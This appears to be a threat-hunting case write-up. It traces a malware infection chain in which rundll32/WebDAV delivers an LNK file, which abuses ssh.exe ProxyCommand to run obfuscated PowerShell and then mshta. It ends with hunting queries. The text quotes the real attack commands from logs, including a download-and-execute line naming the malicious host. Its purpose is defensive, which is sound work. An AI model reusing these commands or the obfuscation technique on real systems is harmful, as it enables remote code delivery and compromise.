Hunter-Case-01 - SSH Proxy Command Lolbas

  • Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads

1.) Information

Hunter Blue's day started with an interesting Case we had seen on an infected Device later also seen on many others which was not Prevented neither Detected or alerted by XDR System.

This is the reason why you should check the initial entry point on a malware infection and don't trust blindly only on EDR or XDR Systems Detections.

You should investigate the initial Entry and Execution to search through the logs with these IoCs / IoAs to find the right artifacts for Threat Hunting.

2.) Attack Chain

Other Seen Infection Chains from our Cases

3.) Initial Access

UPDATE 06122024: In our case we have seen in SOC is that the user was surfing through the internet and searching for some manuals and found a PDF link which he then clicked on and started the initial infection chain.

Infection chain where a user downloaded an LNK file first (via the rundll32.exe WebDAV method).

The LNK file will run ssh.exe (C:\Windows\System32\OpenSSH\ssh.exe) with the following parameter:

"-o ProxyCommand= "powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]' -replace']')".

  • Obfuscated Powershell

The PowerShell command will spawn mshta.exe, thus downloading and executing additional code on the host:

mshta.exe hxxps[:]//berb.fitnessclub-filmfanatics.com/z[.]mp4

  • Malicious mp4 File Downloaded

#Rundll32.exe downloading a LNK File
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop@SSL https://download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk

#LNK File
Windows\System32\OpenSSH\ssh.exe -o ProxyCommand=".....

executing

#Powershell Obfuscated Command
Process : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Started with CMD : powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]'  -replace ']')


#Deobfuscated Command
Process : C:\Windows\System32\mshta.exe Started with CMD : "C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4

4.) Finding through Threat Hunting

  • The Powershell Script was blocked by the XDR System but if you only trust in this Event you will not find the golden information behind this Attack

  • We hunted through the Datalake logs in the whole infrastructure and, yes you guess it right, we found another host executing the same stuff to download the malicious file from this WebDav Server but nothing was Detected or Blocked until the obfuscated Powershell execution.

5.) Mitigation

6.) Detection and Hunting

  • Hunting for malicious "ProxyCommand=" values within the SSH arguments.

  • Hunting for ~ davclnt.dll,DavSetCookie download Commands should be definitely operated in your environment -> see executed Command

  • Also my colleague from Incident Response Team explained it in his Blogpost: https://dfir.ch/posts/search-ms_protocol_handler/ if you want to check how such commands are misused by Threat Actors.

  • Specific indicators include the use of the search-ms URI protocol in HTML files, unexpected pop-ups requesting access to Windows Explorer, and subsequent attempts to access remote servers using the WebDAV protocol.

  • Monitoring for the creation or execution of LNK files pointing to batch scripts will also be a focus.

6.1) Sigma Rules

6.2) Yara Rules

6.3) Hunting Queries Tanium

#This query detects processes where `rundll32.exe` is used to execute `davclnt.dll`, often associated with WebDAV activity. C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*DavSetCookie.*","","",""] from all machines with Is Windows contains true
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*davclnt.dll.*","","",""] from all machines with Is Windows contains true
 
 

6.4) Hunting Queries Defender XDR

#This query detects processes where `rundll32.exe` is used to execute `davclnt.dll`, often associated with WebDAV activity.
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where ProcessCommandLine contains 'rundll32.exe' and ProcessCommandLine contains 'davclnt.dll'
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessCommandLine, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName


  
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

 
 
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessFileName, AccountName
| where ProcessCommandLine !contains "Interner-Server"
| where ProcessCommandLine contains "cloudflare" 
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

 
 
 

7.) Conclusion and Learning for a Hunter Blue

  • The EDR on this host didn't pick up the malicious WebDAV commands, showcasing how fruitful threat hunting can be.

Last updated